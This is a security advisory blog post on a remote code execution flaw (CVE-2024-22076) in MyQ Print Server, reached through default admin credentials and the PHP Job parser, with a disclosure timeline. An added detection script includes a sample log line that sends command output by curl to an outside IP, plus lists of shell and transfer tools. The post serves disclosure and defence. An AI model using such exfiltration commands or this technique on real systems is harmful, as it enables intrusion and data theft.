Unmasking Web Vulnerabilities: A Tale of Default Admin Credentials and PHP Command Execution (CVE-2024-22076)

15 February 2024

MyQ Print Server before 8.2 patch 43 allows Remote Code Execution.

Reporters/authors
Dylan Wesselink, Edwin Siebel

Introduction

In the ever-evolving landscape of cybersecurity, penetration testing remains a crucial tool for identifying and addressing vulnerabilities before malicious actors can exploit them. Recently, our team embarked on a penetration testing assessment that uncovered a vulnerability in the MyQ printer software, highlighting the importance of robust security practices. In this blog post, we’ll delve into the discovery of default admin credentials as the initial foothold, leading to the execution of PHP as the NT authority user.

The Prelude

Our journey began with a security assessment of a web application. The target organization had enlisted our expertise to conduct a thorough evaluation. As penetration testers, we knew that the first line of defense is often the weakest, and our hunch proved right.

Default Admin Credentials

Upon accessing the web application, our initial reconnaissance revealed a startling (but actually pretty common…) discovery – default admin credentials were still in use. This basic oversight, a classic blunder in the realm of cybersecurity, handed us a golden ticket to explore further. The unsuspecting web interface granted us access to administrative controls, setting the stage for a deeper dive into the software’s vulnerabilities.

Escalation of Privileges

With administrative access secured, our next objective was to escalate and uncover potential avenues for exploitation. The targeted web application, running on a Windows environment, provided an opportunity we couldn’t ignore. Leveraging our access, we identified a vulnerability that allowed us to execute PHP code as the NT authority user – a highly privileged account within the Windows operating system.

Executing PHP as NT Authority

The ability to execute PHP code as the NT authority user is a potent weapon in the hands of an attacker. NT authority, also known as SYSTEM, is the highest level of privilege on a Windows system, surpassing even administrator rights. This level of access grants unfettered control over the entire operating system, making it a coveted target for adversaries.

Exploiting this vulnerability, we were able to execute arbitrary PHP code with SYSTEM-level privileges. This meant we could manipulate files, access sensitive data, and potentially compromise the entire system over the Internet. The implications of such a breach are severe, underscoring the critical need for organizations to prioritize security and adopt best practices in credential management.

Conclusion

The web vulnerability we encountered serves as a stark reminder that even seemingly secure systems can harbor critical flaws. Default admin credentials, a seemingly benign oversight, opened the door to a cascade of potential exploits, culminating in the execution of PHP as the NT authority user.

The lessons learned from this penetration testing engagement are clear: organizations must remain vigilant in identifying and remedying vulnerabilities, especially in foundational elements like default credentials. Regular penetration testing, coupled with robust security protocols, is essential to fortifying digital defenses and thwarting the ever-evolving tactics of cyber adversaries.

As the cybersecurity landscape continues to evolve, it is imperative that organizations stay one step ahead, fortifying their digital fortresses to withstand the relentless onslaught of cyber threats. The journey towards a secure digital environment is ongoing, and it starts with acknowledging and addressing vulnerabilities head-on.

Note that in this case the MyQ web application was publicly accessible from the Internet, which makes this vulnerability that much more severe.

Responsible Disclosure

It is worth mentioning that the team behind the MyQ software handled this responsible disclosure adequately. There was clear and transparent contact throughout the entire process.

Access42 disclosed the vulnerability to the vendor as follows:

Tested version: MyQ 8.2 (patch 29)

*It is currently unknown if newer or older versions are (still) vulnerable.*

Requirements

  • Valid user account with administrative privileges.
  • The setting Job parser must be enabled. Could be enabled with valid administrative credentials.

Steps to Reproduce
When all the above criteria are met, exploitation is possible.

Due to the implementation and execution of the Job parser, the output of the executed payload is not shown in the interface, so the attack has to be carried out blind. The ‘system’ function (https://www.php.net/manual/en/function.system.php) in PHP is best suited for this task: it executes a system command and immediately displays the output.

Note: Other PHP system functions have not been tried, but could yield similar results.

The program curl is used in command lines or scripts to transfer data. Its data option (--data) allows the output of the executed command to be sent as POST data to a server of choice.

This demonstrates that programs such as ‘whoami’ can be executed and their output retrieved.

The output also proves that the execution of the command is done by the SYSTEM account, which is the highest privilege level in the Windows user model.
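From the defender's side, the activity described above (a PHP interpreter running as SYSTEM spawning whoami, cmd or curl) is visible in process-creation telemetry. The following detection sketch is an added example, not code from the original advisory or from MyQ; the event format, file paths and interpreter names are constructed assumptions.

```python
"""Detection sketch (added example): flag process-creation events where a
PHP interpreter spawns a shell or a discovery/transfer tool, and rate the
finding higher when it runs as NT AUTHORITY\\SYSTEM, as in the advisory."""
from collections import namedtuple

# Assumed interpreter names; the actual binary MyQ ships is not stated on the page.
PHP_INTERPRETERS = {"php.exe", "php-cgi.exe", "php-win.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe", "whoami.exe"}
SYSTEM_USER = "nt authority\\system"

Event = namedtuple("Event", "user image parent cmdline")


def parse_event(line):
    """Parse a constructed 'Key=Value|Key=Value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|") if "=" in part)
    return Event(fields.get("User", ""), fields.get("Image", ""),
                 fields.get("ParentImage", ""), fields.get("CommandLine", ""))


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return 'high', 'medium' or None for one event."""
    if basename(ev.parent) not in PHP_INTERPRETERS:
        return None
    if basename(ev.image) not in SUSPICIOUS_CHILDREN:
        return None
    # PHP spawning a shell is suspicious on its own; doing it as SYSTEM is critical.
    return "high" if ev.user.lower() == SYSTEM_USER else "medium"


def scan(lines):
    """Return (severity, command line) for every event that matches the rule."""
    hits = []
    for ev in map(parse_event, lines):
        severity = classify(ev)
        if severity:
            hits.append((severity, ev.cmdline))
    return hits


SAMPLE_LOG = [  # constructed sample events, not real MyQ telemetry
    "User=NT AUTHORITY\\SYSTEM|Image=C:\\PrintServer\\php\\php.exe|ParentImage=C:\\PrintServer\\server.exe|CommandLine=php.exe jobparser.php",
    "User=NT AUTHORITY\\SYSTEM|Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\PrintServer\\php\\php.exe|CommandLine=cmd.exe /c whoami",
    "User=NT AUTHORITY\\SYSTEM|Image=C:\\Windows\\System32\\curl.exe|ParentImage=C:\\PrintServer\\php\\php.exe|CommandLine=curl.exe --data @out.txt http://203.0.113.5/",
    "User=CORP\\printsvc|Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\PrintServer\\php\\php.exe|CommandLine=cmd.exe /c dir",
]

if __name__ == "__main__":
    for severity, cmdline in scan(SAMPLE_LOG):
        print(f"ALERT [{severity}]: {cmdline}")
```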

Remediation
Never call out to OS commands from application-layer code. In addition, strong input validation must be performed, including whitelisting of permitted values.

Impact
The impact of a Remote Code Execution vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Disclosure
Could the existence of this vulnerability be confirmed by MyQ? We understand that providing a formal response and/or patching the vulnerability takes time. Therefore, we would appreciate a reaction within 60 days, as we do intend to publicly disclose this vulnerability.

Timeline
[2023/11/23 02:41:59 PM CET] Initial disclosure to the vendor.
[2023/11/23 04:40:00 PM CET] First response from the vendor.
[2023/12/12 08:13:40 PM CET] Confirmation of an upcoming patch.
[2024/01/05 10:57:38 AM CET] CVE-2024-22076 (https://nvd.nist.gov/vuln/detail/CVE-2024-22076) acknowledged.
[2024/01/22] Patch released by the vendor (https://docs.myq-solution.com/en/print-server/8.2/technical-changelog).
[2024/02/15 11:00:00 AM CET] Vulnerability publicly disclosed.

MyQ's Solution
MyQ has implemented a setting to lock/unlock the Queue's Scripting (PHP) settings against changes, which improves security by allowing these settings to be kept in read-only mode at all times. This diminishes the vulnerability, but it also limits the intended functionality considerably.

By default this option is disabled.

See: https://docs.myq-solution.com/en/print-server/8.2/enable-modification-of-scripting

CVE-2024-22076